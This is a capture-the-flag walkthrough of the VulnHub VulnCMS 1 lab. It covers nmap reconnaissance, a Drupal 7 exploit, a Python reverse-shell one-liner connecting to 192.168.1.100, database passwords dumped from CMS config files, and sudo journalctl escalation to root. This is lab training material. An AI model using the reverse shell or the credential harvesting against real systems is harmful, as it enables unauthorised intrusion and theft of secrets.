VULNCMS : 1 | Vulnhub Walkthrough

Here is a walkthrough of vulncms 1 vulnhub.

Today we are doing another one machine of Vulnhub.

Goal : get the user and root flag.

Level : Beginner (Piece of Cake)

[Tip : No need to use any other tool in the box only nmap is enough.]

[Note : This box is all about CMS as its name suggests]

Lab Setup :

From here you can download the machine and setup it on your virtualbox.

As its name suggest it has a vulnerable CMS, Let’s look into it.

Let’s start with reconnaissance.

Nothing more only the default Linux Interface.

Here is the ip of machine 192.168.1.51.

Search for the open ports.

# Nmap 7.91 scan initiated Tue Jun 16 14:36:41 2021 as: nmap -T4 -vv -sT -p- -oA nmap/allports 192.168.1.51
Nmap scan report for 192.168.1.51
Host is up, received arp-response (0.00018s latency).
Scanned at 2021-06-16 14:36:41 EDT for 2s
Not shown: 65530 closed ports
Reason: 65530 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
5000/tcp open upnp syn-ack
8081/tcp open blackice-icecap syn-ack
9001/tcp open tor-orport syn-ack

MAC Address: 08:00:27:3C:22:7A (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap

It has a multiple open ports, Let’s search for the version.

# Nmap 7.91 scan initiated Tue Jun 16 14:38:00 2021 as: nmap -T4 -sT -sV -sC -A -p- -oA nmap/complete 192.168.1.51
Nmap scan report for 192.168.1.51
Host is up (0.00058s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8c:9f:7e:78:82:ef:76:f6:26:23:c9:52:6d:aa:fe:d0 (RSA)
| 256 2a:e2:f6:d2:52:1c:c1:d0:3d:aa:40:e6:b5:08:1d:45 (ECDSA)
|_ 256 fa:c9:eb:58:e3:d2:b7:4a:74:77:fc:69:0e:b6:68:08 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: W3.CSS Template
5000/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.7.2
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: fsociety – Just another WordPress site
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Home
9001/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: fsociety.web
MAC Address: 08:00:27:3C:22:7A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.1.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

So we saw that it has multiple CMS, Wordpress, Drupal and Joomla.

And the nmap disclose the version of drupal, so firstly i searched for the drupal exploit, Because we’ve exploited too many machines with Drupal 7 Version.

Drupal Login page reveals the user name.

And Here, we got the exploit.

And here we are in the box.

Let’s get a stable shell first.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.100",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

I used python for the stable shell.

Wordpress : 
define( 'DB_NAME', 'wordpress_db' );
/** MySQL database username */
define( 'DB_USER', 'wp_admin' );
/** MySQL database password */
define( 'DB_PASSWORD', 'UUs3R_C!B@p@55' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Drupal :
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal_db',
'username' => 'drupal_admin',
'password' => 'p@$$_C!rUP@!_cM5',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);

Joomla :
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'joomla_admin';
public $password = 'j00m1_@_dBpA$$';
public $db = 'joomla_db';

While enumerating in the box got the database creds.

Not next part is to check the active users with shell.

We have 3 users with shell.

let’s search for the another user creds.

From the database got some details about user.

+----+------------+-----------------+-------------------------+--------------------------------------------------------------+
| id | name | username | email | password |
+----+------------+-----------------+-------------------------+--------------------------------------------------------------+
| 46 | Super User | joomlaCMS_admin | Fluntence54@armyspy.com | $2y$10$EYc6SKfMLzlLE/IcD9a6XeAe2Uv7WTBFlbbqRrnpht1K0M1bLrWee |
| 47 | elliot | elliot | 5T3e!_M0un7i@N | $2y$10$jddnEQpjriJX9jPxh6C/hOag4ZZXae4iVhL7GVRPC9SHWgqbi4SYy |
+----+------------+-----------------+-------------------------+--------------------------------------------------------------+

We got the hash but the hash is not useful cause all the passowrd is in leet form so maybe the email is the password.

And yess we are wright email is the password. and now we are in with elliot, let’s try to get another user.

After looking for tyrell got the creds file.

And

Credentials : 
Username: tyrell
Password: mR_R0bo7_i5_R3@!_

Now last part is to root the machine.

And we have a privlege to run journalctl as a root.

Rooted !!

Nothing intresting in the Box.